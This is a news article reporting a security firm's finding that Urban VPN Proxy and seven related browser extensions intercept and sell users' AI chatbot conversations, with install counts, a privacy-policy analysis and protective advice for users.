Millions of users who rely on browser extensions for privacy and convenience have unknowingly exposed their most personal data, including full AI chat conversations, to hidden tracking systems. A recent investigation by cybersecurity firm Koi revealed that eight popular browser extensions—with a combined install base exceeding 8 million—are secretly collecting and selling AI chat interactions for marketing analytics. These findings highlight the widening cracks in browser ecosystem oversight and the deceptive practices lurking behind “free” online tools that promise privacy protection.
A Deep Breach of User Trust
According to Koi’s analysis, the extensions—available on both the Chrome Web Store and Microsoft Edge Add-ons—appear to perform legitimate functions such as VPN routing, ad blocking, and enhanced browsing security. Many even boast “Featured” badges, endorsements that typically signify compliance with Google and Microsoft quality standards. But behind the glossy veneer lies a sophisticated data-harvesting mechanism. The extensions inject specific “executor” scripts into web pages every time users access platforms such as ChatGPT, Claude, Gemini, Copilot, Grok, or Meta AI. These scripts override normal browser communication functions, capturing complete chat transcripts, timestamps, and platform details before sending the data to servers controlled by the developers.
How the Invisible Harvest Works
The mechanism operates by intercepting browser request APIs such as fetch() and HttpRequest, diverting them through a concealed data-collection layer. From there, the information—spanning from casual prompts to confidential questions—is compressed and transmitted to proprietary endpoints. Even when users disable the extensions’ visible functions like VPN or ad blocking, the data collection continues uninterrupted. The only effective way to stop the harvesting, Koi emphasized, is to disable or uninstall the extensions entirely.
The collected data includes:
– Prompts and responses for every AI chat interaction.
– Conversation identifiers and time stamps.
– Session metadata, platform, and model information.
– Additional browsing data associated with the session.
This comprehensive extraction effectively gives extension operators full visibility into user-generated dialogues, including sensitive material such as medical inquiries, legal advice, or financial details. In short, anyone using these extensions since mid-2025 should assume that their AI chat histories have been stored and shared for commercial profiling.
Tracking Begins with Urban VPN
Koi first pinpointed the data collection in the Urban VPN Proxy extension, a widely used free VPN service that advertises AI protection capabilities. The harvesting practice began with version 5.5.0, rolled out in early July 2025. Urban VPN claimed to scan AI prompts for personal details to “enhance safety,” but its code revealed extensive backend logging that far exceeded that description. Following this discovery, Koi identified seven more extensions operated by the same developer—Urban Cyber Security—with identical data collection patterns.
| Platform | Extension | Install Count |
|---|---|---|
| Chrome Store | Urban VPN Proxy | 6 million |
| Chrome Store | 1ClickVPN Proxy | 600,000 |
| Chrome Store | Urban Browser Guard | 40,000 |
| Chrome Store | Urban Ad Blocker | 10,000 |
| Edge Add-ons | Urban VPN Proxy | 1.32 million |
| Edge Add-ons | 1ClickVPN Proxy | 36,459 |
| Edge Add-ons | Urban Browser Guard | 12,624 |
| Edge Add-ons | Urban Ad Blocker | 6,476 |
Misleading Privacy Promises
The extensions come with privacy statements that seem reassuring at first glance. For example, Urban VPN lists “AI protection” as a benefit and even claims to check prompts for personal information or unsafe links. However, deeper within its lengthy privacy policies lies obscure language authorizing the collection of “prompts and outputs queried by the end-user or generated by the AI chat provider.” This disclosure, buried in a 6,000-word document, allows “marketing analytics purposes” for the shared data. In effect, it gives developers permission to siphon users’ conversations without informed consent.
Urban Cyber Security, the company behind these tools, identifies BiScience as its affiliated data analysis partner. BiScience’s business model centers on transforming user data into “actionable market intelligence,” meaning that AI chats—potentially containing medical conditions, confidential code, or emotional confessions—are parsed, categorized, and monetized.
Corporate Silence and Oversight Failure
Despite the glaring privacy violations, the presence of “Featured” badges implies a failure of due diligence by both Google and Microsoft. Neither company has provided a clear explanation of how these extensions met their review standards or why they remain publicly available. After multiple inquiries, Microsoft simply responded that it had nothing to “share,” while Google offered no comment at all. Developers and affiliated entities, including Urban Cyber Security and BiScience, also declined to reply to questions regarding their data collection practices.
Broader Implications for Online Privacy
The revelations expose a fundamental contradiction in how users perceive browser extensions: tools designed to protect privacy can also become powerful surveillance engines. Koi’s findings illustrate how casually users grant permissions to extensions that integrate deeply with web pages and APIs. Once granted, those permissions can bypass browser safeguards and lead to large-scale data exfiltration.
The discovery underscores the fragile nature of privacy when interacting with modern AI platforms. Many people use chatbots for conversations involving health, career, and personal identity — domains traditionally protected by strict confidentiality protocols. Yet, in the race for convenience, users are inadvertently pouring their digital lives into unsecured pipelines vulnerable to exploitation.
Lessons for Users and Developers
These revelations serve as a clear warning for both developers and consumers. Users can protect themselves by taking simple steps:
– Regularly audit installed browser extensions.
– Disable or uninstall tools that request excessive permissions.
– Verify developer credibility before installation.
– Avoid sharing sensitive information through AI chatbots unless explicitly protected by confidentiality policies.
For developers, transparency and ethical governance should become the foundation of modern software ethics. Clear disclosures, third-party audits, and minimal data collection are essential to rebuild public trust eroded by deceptive design.
The Growing Need for Accountability
Koi’s discovery demonstrates how unchecked data-sharing practices can subvert user autonomy in ways few anticipate. The lines between privacy, advertising, and surveillance continue to blur as browser ecosystems prioritize visibility and feature promotion over verification. Whether Google and Microsoft will act decisively remains uncertain, but one thing is clear: the allure of “free” extensions often carries a hidden cost—paid not in dollars, but in the intimate details of users’ conversations and lives.
The scandal serves as a reminder that in today’s AI-driven world, digital safety begins not with software promises but with user skepticism. Every click, every chat, and every extension adds another layer to the invisible marketplace where online privacy is quietly traded away.



